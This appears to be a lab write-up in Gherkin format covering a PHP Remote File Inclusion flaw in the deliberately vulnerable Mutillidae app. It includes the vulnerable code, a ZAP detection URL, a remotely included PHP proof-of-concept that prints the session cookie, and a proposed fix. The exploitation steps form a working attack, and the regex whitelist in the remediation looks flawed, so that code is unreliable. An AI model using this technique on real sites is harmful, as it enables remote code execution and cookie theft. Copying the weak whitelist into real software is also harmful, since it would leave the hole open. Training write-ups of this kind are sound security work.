## Version 1.4.1
## language: en

Feature: Detect vulnerabilities in Mutillidae application
  TOE:
    mutillidae
  Category:
    0098
  Location
    http://172.17.0.2/mutillidae/ - page (parameter)
  CWE:
    CWE-098: PHP Remote File Inclusion
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Exploit vulnerability of application
  Recommendation:
    Implement white list checking

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Zorin OS              | 12.4      |
    | Docker                | 18.09.2   |
    | OWASP ZAP             | 2.7.0     |
    | Chromium              | 73.0.3683 |
  TOE information:
    Given The site is running from docker
    And I am accessing the site http://172.17.0.2/mutillidae/
    And the server is running MariaDB version 15.1
    And PHP version 7.0
    And Apache version 2.4.25


  Scenario: Normal use case
    Given I access http://172.17.0.2/mutillidae/
    And I select the option OWASP 2017
    And I go to the option A7 - Cross Site Scripting (XSS)
    And I select the option Reflected (First Order)
    And I go to the option Arbitrary File Inclusion
    Then it loads the page
    """
    http://172.17.0.2/mutillidae/index.php?page=arbitrary-file-inclusion.php
    """

  Scenario: Static detection
    Given I open the file
    """
    /var/www/html/mutillidae/index.php
    """
    And I see:
    """
    532 if (isset($_REQUEST["page"])) {
    533   $lPage = $_REQUEST["page"];
    534 }
    """
    Then I find this file has an RFI vulnerability
    And I see the 'page' has no whitelist policy
    And I see it can open any page even outside its own server

  Scenario: Dynamic detection
    Given I'm running OWASP ZAP 2.7.0
    And I scan for vulnerabilities
    And the scanner found "Remote File Inclusion" alert
    And it shows URL
    """
    http://172.17.0.2/mutillidae/index.php?page=http%3A%2F%2Fwww.google.com%2F
    """
    And I browse that URL
    And it loads google page

  Scenario: Exploitation
    Given the vulnerable page loads any remote page
    Then I load in my github repository a php file
    """
    1 <?php
    2 echo 'RFI works!!!';
    3 echo '<br>';
    4 echo '¡Now Cookies: ' . htmlspecialchars($_COOKIE["PHPSESSID"]) . '!';
    5 ?>
    """
    Then I load the raw page as parameter in the vulnerable application
    And I see that it run the php file [evidence](image1.png)

  Scenario: Remediation
    Given the inclusion of external pages as parameter
    Then I access to the file and include a whitelist
    And I allow it to load only same directory pages
    """
    532 $re = '/([a-z]*\-*)*.[a-z]*/m';
    533 preg_match_all($re, $_REQUEST["page"], $matches, PREG_SET_ORDER);
    534 if (implode($matches[0])==$_REQUEST["page"]){
    535   if (isset($_REQUEST["page"])) {
    536     $lPage = $_REQUEST["page"];
    537   }
    538 }else{
    539   $lPage = __ROOT__.'/page-not-found.php';
    540 }
    """
    And I browse for local pages and it loads
    And I pass external pages on parameter and display the error page

  Scenario: Scoring
    Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
    Temporal: Attributes that measure the exploit's popularity and fixability
    5.8/10 (Medium) E:H/RL:O/RC:R
    Environmental: Unique and relevant attributes to a specific user environment
    4.4/10 (Medium) MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:L/MI:L/MA:L
